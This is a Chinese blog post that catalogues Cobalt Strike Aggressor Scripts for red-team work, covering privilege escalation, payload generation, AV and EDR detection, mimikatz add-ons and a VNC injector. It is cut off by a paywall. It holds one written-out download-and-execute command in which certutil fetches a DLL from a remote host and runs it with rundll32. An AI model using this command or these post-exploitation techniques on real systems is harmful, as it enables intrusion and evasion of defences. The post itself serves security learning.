Cobalt Strike Aggressor Script

最新推荐文章于 2024-05-16 10:07:25 发布

f_carey

最新推荐文章于 2024-05-16 10:07:25 发布

阅读量1k

点赞数

分类专栏： Metasploit 文章标签： CS colbaltstrike

本文链接：https://blog.csdn.net/f_carey/article/details/122692765

版权

郑重声明：
本笔记编写目的只用于安全知识提升，并与更多人共享安全知识，切勿使用笔记中的技术进行违法活动，利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责，共同维护网络文明和谐。

Cobalt Strike Aggressor Script

1 ProcessTree.cna 与 ProcessColor.cna
- 2 elevate.cna
3 Vincent Yiu 脚本合集
- 3.1 CVE-2018-4878.cna
- 3.2 auto-prepenv.cna
- 3.3 Blacklist.cna
- 3.4 mimikatz_addons.cna
- 3.5 ping.cna
- 3.6 portfwd.cna
- 3.7 vnc-psh.cna
4 harleyQu1nn 脚本合集
- 4.1 AVQuery.cna
- 4.2 ArtifactPayloadGenerator.cna
- 4.3 CertUtilWebDelivery.cna
- 4.4 EDR.cna
- 4.5 logvis.cna
- 4.6 ProcessMonitor.cna
- 4.7 RedTeamRepo.cna
- 4.8 SMBPayloadGenerator.cna
- 4.9 logger.cna
5 bluscreenofjeff 脚本合集
- 5.1 beacon_to_empire.cna
- 5.2 beaconestablishednote.cna
- 5.3 beaconid_note.cna
- 5.4 mimikatz-every-30m.cna
- 5.5 mimikatz-timestamp-note-BETA.cna
- 5.6 ping_aliases.cna
- 5.7 powershell.cna
- 5.8 ps-window-alias.cna
- 5.9 silver-tickets.cna
- 5.10 sleep-down-when-no-operators.cna
- 5.11 sleeptimer.cna
- 5.12 beaconpire.cna
- 5.13 CCDC 目录下脚本
- 5.14 OPSEC Profiles 目录下脚本
6 ramen0x3f 脚本合集
- 6.1 bueller.cna
- 6.2 cdolla.cna
- 6.3 portscan_results.cna
其他人收集的相关脚本
- 6.1 michalkoczwara 收集
- - 6.1.1 service-reboot.cna
  - 6.1.2 sticky-keys.cna
- 6.2 CobaltStrike-ToolKit
7 persistence.cna 持久化脚本
- 7.1 ZonkSec
8 rasta-mouse 的脚本
- 8.1 loader.cna
- 8.2 dcom.cna
9 RhinoSecurityLabs：BypassUAC
10 Und3rf10w 脚本
- 10.1 KitLoader.cna
- 10.2 AnnoyKit.cna
- 10.3 AntiForensicsKit.cna
- 10.4 CredKit.cna
- 10.5 EnumKit.cna
- 10.6 PersistKit.cna
- 10.7 PrivescKit.cna
- 10.8 thirdparty.cna
- 10.9 auto-keylogger.cna
- 10.10 inveigh.cna
- 10.11 ebowla-interop.cna
- 10.3 PersistKit.cna
- 10.4 CredKit.cna
11 001SPARTaN 脚本合集
12 gaudard 红队脚本合集
13 其他脚本集合

Aggressor Script是Cobalt Strike 3.0版本以上的一个内置脚本语言，由 Sleep语言解析，Cobalt Strike 3.0以上版本的菜单、选项、事件都由default.cna构建。红队人员可以通过它来调用一些IRC、Webhook接口去对接机器人，实现自动化渗透与监控，Aggressor Script是Cobalt Strike这款C2平台的画龙点睛之笔

1 ProcessTree.cna 与 ProcessColor.cna

下载地址：ars3n11/Aggressor-Scripts: Cobalt Strike aggressor scripts (github.com)
功能：ps命令展示进程树并上色，作者实际上是修改自 harleyQu1nn 的 ProcessColor.cna，现在两者功能已经完全一致了。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pVcMrFvK-1643118933736)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115214728115.png)]

2 elevate.cna

下载地址：rsmudge/ElevateKit: The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike’s Beacon payload. (github.com)
功能：CS作者rsmudge大佬官方出品，增加几种提权方式。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VObsunYs-1643118933737)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115221322026.png)]

3 Vincent Yiu 脚本合集

下载地址：vysecurity/Aggressor-VYSEC (github.com)

3.1 CVE-2018-4878.cna

下载地址：vysecurity/CVE-2018-4878: Aggressor Script to launch IE driveby for CVE-2018-4878 (github.com)
功能：VincentYiu写的一键起CVE-2018-4878（Flash漏洞）服务脚本

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kWSsmv8N-1643118933738)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115221849618.png)]

3.2 auto-prepenv.cna

功能：auto-prepenv.cna 机器上线时自动把explorer.exe设置为ppid，测试时不知道是不是权限原因没有生效。

3.3 Blacklist.cna

功能：Blacklist.cna 可以实现设置一个上线机器的黑名单列表，如果机器再次上线会自动退出会话。适用于遇到溯源或者蜜罐以及一些虚拟分析环境。

3.4 mimikatz_addons.cna

功能：mimikatz_addons.cna 则是新注册了一个password_change命令，可以实现直接使用mimikatz的密码更改功能强制修改NTLM哈希。

3.5 ping.cna

功能：ping.cna 注册一个ping命令，并转换IP地址为HEX的形式去执行该命令。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-scMusCjJ-1643118933738)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117103703753.png)]

3.6 portfwd.cna

功能：portfwd.cna 会注册一个portfwd命令，可以实现端口转发。

3.7 vnc-psh.cna

功能：
vnc-psh.cna 是一个把Invoke-Vnc.ps1 注入到内存当中开启VNC服务的脚本，默认端口为5900，密码为SuperMan123。

4 harleyQu1nn 脚本合集

4.1 AVQuery.cna

功能：AVQuery.cna 检查杀毒是通过检查注册表键值来判断，同样的可以自行添加自己需要的条目。
```
AV_Query
```
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gB5xhUVe-1643118933739)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115222516289.png)]

4.2 ArtifactPayloadGenerator.cna

功能：ArtifactPayloadGenerator.cna 生成多种类型的后门文件，生成的结果位于cs目录下的 opt\cobaltstrike 目录下。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S0RCbglK-1643118933739)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115223543134.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6VYKCPCD-1643118933739)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115224705490.png)]

4.3 CertUtilWebDelivery.cna

功能：类似使用CertUtil下载文件
命令执行：
```
powerpick certutil.exe -urlcache -split -f http://192.168.0.2:280/dll.txt Adobedll.dll; rundll32.exe Adobedll.dll,StartW

powerpick：不使用 powershell.exe 执行 powershell 命令。这个命令依赖于由 Lee Christensen 开发的非托管 PowerShell 技术。powershell 和 powerpick 命令会使用当前令牌（ token ）。
```
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-v7UBu6uW-1643118933740)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115232659018.png)]

CertUtil下载文件参考：certutil在传输payload中的新奇技巧 - admin-神风 - 博客园 (cnblogs.com)

4.4 EDR.cna

功能：EDR.cna使用检测驱动的方式来检测是否存在终端安全产品。相对于主流杀毒软件，EDR 终端安全产品主要用来反APT类的持久化攻击，所以较之常规杀毒更为难缠。
```
# edr_query [hostname] [arch]
edr_query localhost x64
# localhost 表示为本地主机
```
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-q3Y4fvbx-1643118933740)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115233447511.png)]

4.5 logvis.cna

功能：logvis.cna 实现了beacon command log的可视化。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UVzeGRZr-1643118933741)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115233706638.png)]

4.6 ProcessMonitor.cna

功能：ProcessMonitor.cna 可以实现指定时间段内对于程序运行情况的监控。
```
ProcessMonitor Start 1m
```
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0Zjq

最低0.47元/天解锁文章

f_carey

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
Cobalt Strike Aggressor Script

郑重声明：本笔记编写目的只用于安全知识提升，并与更多人共享安全知识，切勿使用笔记中的技术进行违法活动，利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责，共同维护网络文明和谐。Cobalt Strike Aggressor Script 1 ProcessTree.cna 与 ProcessColor.cna2 elevate.cna3 Vincent Yiu 脚本合集3.1 CVE-2018-4878.cna3.2 auto-prepenv.cna3.3 Blacklist.cna.
复制链接

扫一扫